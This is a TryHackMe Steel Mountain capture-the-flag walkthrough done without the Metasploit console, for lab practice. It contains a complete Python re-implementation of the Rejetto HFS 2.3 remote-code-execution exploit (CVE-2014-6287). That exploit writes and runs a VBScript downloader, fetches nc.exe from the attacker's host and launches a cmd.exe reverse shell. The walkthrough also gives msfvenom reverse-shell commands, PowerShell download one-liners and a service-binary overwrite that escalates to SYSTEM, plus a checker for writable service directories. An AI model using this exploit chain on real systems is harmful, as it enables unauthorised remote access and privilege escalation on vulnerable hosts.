TryHackMe — Steel Mountain w/o MSF
Use PowerShell commands and winPEAS to enumerate the system and collect the information needed to escalate privileges (no Metasploit console; msfvenom is only used to build a payload).

Machine Information:

[1]NMAP Scan (-T needs a timing level, e.g. -T4; a bare -T is an error)
sudo nmap -A -T4 -p- 10.10.255.1 -oN nmap_scan

[2]Research vulnerability (the scan shows Rejetto HttpFileServer, HFS 2.3, on port 8080)
searchsploit hfs 2.3
searchsploit -x 39161

[3]Edit exploit
Copy 39161.py (HFS 2.3.x remote command execution, CVE-2014-6287) into the working directory (searchsploit -m 39161; the notes below call it exploit.py), then set ip_addr to the attacker IP (10.11.17.48) and local_port to the listener port (4444). The script fetches nc.exe from http://<ip_addr>:80/nc.exe, so the HTTP server in step 4 has to listen on port 80.

[4]Setup HTTP server to serve nc.exe and winPEAS (port 80 is hard-coded in the exploit; on Kali, nc.exe ships under /usr/share/windows-resources/binaries/. With Python 3 the equivalent is python3 -m http.server 80)
sudo python -m SimpleHTTPServer 80

[5]Setup a netcat listener then run exploit (the script is Python 2, it imports urllib2. Exploit-DB notes it may need more than one run: the first run usually only drops nc.exe on the target, a second run gets the callback)
nc -lvnp 4444
python exploit.py 10.10.255.1 8080
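To make the values edited in step 3 visible as plain parameters, here is a Python 3 re-implementation of the request chain that 39161.py sends. This is an added example, not the page's script nor the Exploit-DB code: the macro order and the C:\Users\Public paths follow the published exploit, but the helper names, the command-line interface and the 10.11.17.48/4444 defaults are this example's own assumptions. HFS 2.3 passes the ?search= value into its macro engine, and the leading %00 null byte defeats the check that should strip "{." macro markers; the exploit then saves a VBScript downloader, executes it to fetch nc.exe from our port 80 HTTP server, and finally executes nc.exe -e cmd.exe back to the listener.

```python
"""Python 3 re-implementation of the EDB 39161 (HFS 2.3.x, CVE-2014-6287) request chain.
Added example: not the page's exploit.py and not the Exploit-DB script itself."""
import sys
import urllib.request
from typing import List
from urllib.parse import quote

# Target-side paths used by the published exploit (assumed writable for HFS's user).
VBS_PATH = r"C:\Users\Public\script.vbs"
NC_PATH = r"C:\Users\Public\nc.exe"


def vbs_downloader(lhost: str) -> str:
    """VBScript that downloads http://<lhost>/nc.exe (port 80) to C:\\Users\\Public\\nc.exe."""
    return "\r\n".join([
        'dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")',
        'dim bStrm: Set bStrm = createobject("Adodb.Stream")',
        f'xHttp.Open "GET", "http://{lhost}/nc.exe", False',
        "xHttp.Send",
        "",
        "with bStrm",
        "    .type = 1 '//binary",
        "    .open",
        "    .write xHttp.responseBody",
        f'    .savetofile "{NC_PATH}", 2 \'//overwrite',
        "end with",
    ])


def macro_path(macro: str) -> str:
    """URL path that smuggles one HFS macro through the search parameter.
    %00 is the null byte that breaks HFS's macro-marker filtering; everything
    except the '|' argument separator is percent-encoded so the macro survives
    as a single query-string value."""
    return "/?search=%00{.+" + quote(macro, safe="|") + ".}"


def exploit_requests(lhost: str, lport: int) -> List[str]:
    """The three request paths, in the order 39161.py sends them.
    lhost/lport are the attacker IP and listener port (ip_addr/local_port in the original)."""
    return [
        macro_path(f"save|{VBS_PATH}|{vbs_downloader(lhost)}"),      # write the downloader
        macro_path(f"exec|cscript.exe {VBS_PATH}"),                  # run it -> nc.exe lands
        macro_path(f"exec|{NC_PATH} -e cmd.exe {lhost} {lport}"),    # connect the shell back
    ]


def run(rhost: str, rport: int, lhost: str, lport: int, timeout: float = 10.0) -> int:
    """Send the chain; returns how many requests received an HTTP response.
    The final request blocks while the shell is alive, so a timeout there is normal."""
    answered = 0
    for path in exploit_requests(lhost, lport):
        url = f"http://{rhost}:{rport}{path}"
        try:
            with urllib.request.urlopen(url, timeout=timeout):
                answered += 1
        except Exception as exc:  # connection refused, HTTP error, or the expected timeout
            print(f"[!] {path[:40]}... -> {exc}", file=sys.stderr)
    return answered


if __name__ == "__main__":
    # usage: exploit3.py <rhost> <rport> [lhost] [lport]; defaults are this walkthrough's values
    if len(sys.argv) < 3:
        sys.exit("usage: exploit3.py <rhost> <rport> [lhost] [lport]")
    rhost, rport = sys.argv[1], int(sys.argv[2])
    lhost = sys.argv[3] if len(sys.argv) > 3 else "10.11.17.48"
    lport = int(sys.argv[4]) if len(sys.argv) > 4 else 4444
    n = run(rhost, rport, lhost, lport)
    print(f"[*] {n} of 3 requests answered; check the nc listener on port {lport}")
```

As with the original, the HTTP server serving nc.exe must be on port 80 of lhost, and if the shell does not arrive the first time, run it again: the save/exec of the downloader and the nc.exe launch race each other, so the second run typically succeeds because nc.exe is already on disk.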


[6]Download winPEAS for Privilege Escalation (run from the shell obtained in step 5; the file is written to that shell's current directory)
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe"


[7]Run winPEAS (read the services section: it reports AdvancedSystemCareService9, the account it runs as, and that its binary directory is writable by the current user)
winPEAS.exe


[8]Create msfvenom payload and setup a netcat listener (windows/shell_reverse_tcp is a single-stage payload, so a plain nc listener catches it; a staged shell/reverse_tcp would need a Metasploit handler. -f exe-service instead of -f exe produces a binary that answers the service control manager, so it is not killed for failing to start)
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe
nc -lvnp 1234

[9]Stop service (the current user must hold stop/start rights on it; sc qc AdvancedSystemCareService9 shows BINARY_PATH_NAME and SERVICE_START_NAME, which should be LocalSystem for this to be worth doing)
sc stop AdvancedSystemCareService9

[10]Download payload under the directory of the target service then start service (cd into the directory winPEAS reported for the service first; the download overwrites the real ASCService.exe, so copy it aside beforehand. sc start will complain that the service did not respond in time because the payload is not a real service binary, but the shell arrives on the 1234 listener as SYSTEM; with a plain -f exe payload the SCM kills it after about 30 seconds, so read the flag promptly)
powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"
sc start AdvancedSystemCareService9
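Before overwriting a service binary (steps 8 to 10) it is worth confirming the two facts the escalation depends on: the service runs as LocalSystem, and a low-privilege principal can write where the binary lives. The following added example (not part of the page and not winPEAS code) parses the text output of sc qc <service> and icacls <dir> to make that call. The sample outputs are constructed to resemble the room's Advanced SystemCare service; the directory path, the helper names and the principal/rights tables are this example's assumptions.

```python
"""Pre-flight check for a writable-service-binary escalation.
Added example: parses constructed `sc qc` and `icacls` output, not data captured from the box."""
import re
from typing import Dict, List, Tuple

# Groups every interactive low-privilege user belongs to (matched case-insensitively).
LOW_PRIV_PRINCIPALS = {"everyone", r"builtin\users", r"nt authority\authenticated users"}
# icacls rights that let a principal create or overwrite files: Full, Modify, Write, Write-Data.
WRITE_RIGHTS = {"F", "M", "W", "WD"}
# Inheritance/propagation flags icacls prints next to the rights; they are not rights.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# Constructed sample of `sc qc AdvancedSystemCareService9` (directory path assumed).
SERVICE_DIR = r"C:\Program Files (x86)\IObit\Advanced SystemCare"
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Advanced SystemCare Service 9
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""
# Constructed sample of `icacls "<SERVICE_DIR>"`; icacls prints the path on the first ACE line only.
ICACLS_SAMPLE = SERVICE_DIR + r""" BUILTIN\Users:(OI)(CI)(F)
                                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                   BUILTIN\Administrators:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Map each `KEY : value` line of sc qc output to a dict entry."""
    cfg: Dict[str, str] = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def parse_icacls(text: str, path: str) -> List[Tuple[str, List[str]]]:
    """Return (principal, rights) per ACE. DENY entries are dropped, as are inheritance flags."""
    aces: List[Tuple[str, List[str]]] = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(path):          # first ACE line carries the queried path
            line = line[len(path):].strip()
        principal, sep, rest = line.partition(":(")
        if not sep or not principal:       # blank line or the "Successfully processed" summary
            continue
        groups = re.findall(r"\(([^)]*)\)", "(" + rest)
        if "DENY" in groups:               # a deny ACE never grants anything
            continue
        rights = [r for g in groups if g not in INHERIT_FLAGS for r in g.split(",")]
        aces.append((principal, rights))
    return aces


def low_priv_writers(aces: List[Tuple[str, List[str]]]) -> List[str]:
    """Principals any unprivileged user is a member of that hold a write-capable right."""
    return [p for p, rights in aces if p.lower() in LOW_PRIV_PRINCIPALS and WRITE_RIGHTS & set(rights)]


def assess(sc_qc_text: str, icacls_text: str, service_dir: str) -> Tuple[bool, List[str]]:
    """True when the service runs as LocalSystem, its binary sits in service_dir,
    and a low-privilege principal can write there; findings explain the verdict."""
    cfg = parse_sc_qc(sc_qc_text)
    findings: List[str] = []
    account = cfg.get("SERVICE_START_NAME", "")
    binary = cfg.get("BINARY_PATH_NAME", "").strip('"')
    as_system = account.lower() == "localsystem"
    in_dir = binary.lower().startswith(service_dir.lower())
    if not as_system:
        findings.append(f"service runs as {account or 'unknown'}, not LocalSystem")
    if not in_dir:
        findings.append(f"binary {binary!r} is not under {service_dir!r}; check the right directory")
    writers = low_priv_writers(parse_icacls(icacls_text, service_dir))
    findings.append("writable by: " + ", ".join(writers) if writers
                    else "no low-privilege principal has write access")
    return as_system and in_dir and bool(writers), findings


if __name__ == "__main__":
    ok, notes = assess(SC_QC_SAMPLE, ICACLS_SAMPLE, SERVICE_DIR)
    print("exploitable" if ok else "not exploitable")
    for n in notes:
        print(" -", n)
```

On the target the real inputs come from sc qc AdvancedSystemCareService9 and icacls on the directory winPEAS reported; the script can be fed the pasted text offline, which is usually how this check is done when the foothold shell is too unstable to run tools interactively. Deny ACEs and inheritance-only flags are ignored on purpose, so that a BUILTIN\Users:(DENY)(W) entry is not misread as write access.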



References:
https://tryhackme.com/room/steelmountain
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS